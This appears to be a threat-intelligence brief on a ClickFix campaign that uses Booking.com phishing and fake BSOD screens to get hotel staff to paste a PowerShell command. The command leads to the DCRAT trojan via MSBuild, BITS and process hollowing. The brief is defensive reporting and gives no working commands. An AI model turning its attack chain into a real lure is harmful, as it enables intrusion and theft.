ClickFix Campaign: Fake BSOD Screens Deliver DCRAT Malware

A newly uncovered ClickFix social engineering campaign is targeting the hospitality sector in Europe, tricking victims with fake Windows Blue Screen of Death (BSOD) screens to manually execute malware.

Attack Overview

• Campaign name: PHALT#BLYX (tracked by Securonix).
• Initial lure: Phishing emails impersonating Booking.com, claiming large reservation cancellations/refunds.
• Landing page: High-fidelity clone of Booking.com hosted on low-house[.]com.
• Deception flow:
  1. Victim clicks link → fake Booking.com site.
  2. Site displays “Loading is taking too long” error.
  3. Clicking refresh → browser enters full-screen → fake BSOD screen.
  4. BSOD instructs victim to open Run dialog and paste malicious command.

Technical Details

• Malicious command: PowerShell script that:
  • Opens a decoy Booking.com admin page.
  • Downloads a malicious .NET project (v.proj).
  • Compiles it using legitimate MSBuild.exe.
• Payload:
  • Adds Windows Defender exclusions.
  • Triggers UAC prompts for admin rights.
  • Uses BITS (Background Intelligent Transfer Service) to fetch loader.
  • Establishes persistence via .url file in Startup folder.
• Malware deployed:DCRAT (Remote Access Trojan).
  • Injected into aspnet_compiler.exe via process hollowing.
  • Executes in memory for stealth.

DCRAT Capabilities

• Remote desktop access.
• Keylogging.
• Reverse shell.
• In-memory execution of additional payloads.
• Observed payload: cryptocurrency miner.

Impact

• Foothold on networks: Attackers gain remote access to infected systems.
• Lateral movement: Potential spread to other devices in the hospitality environment.
• Data theft: Ability to exfiltrate sensitive information.
• Operational disruption: Hotels and hospitality firms face reputational and financial risks.

Defensive Measures

• For organizations:
  • Train staff to recognize fake BSODs and phishing emails.
  • Block suspicious domains (low-house[.]com).
  • Monitor for unusual MSBuild.exe activity.
  • Restrict PowerShell execution policies.
  • Harden endpoint defenses against process hollowing and BITS abuse.
• For individuals:
  • Remember: real BSODs never provide recovery instructions.
  • Never paste or run commands from untrusted sources.
  • Keep Windows Defender and AV solutions updated.

Takeaway

ClickFix demonstrates how attackers weaponize trust in familiar error screens to bypass user skepticism. By combining phishing, fake BSODs, and living-off-the-land binaries (MSBuild, BITS), adversaries deliver powerful RATs like DCRAT with stealth and persistence.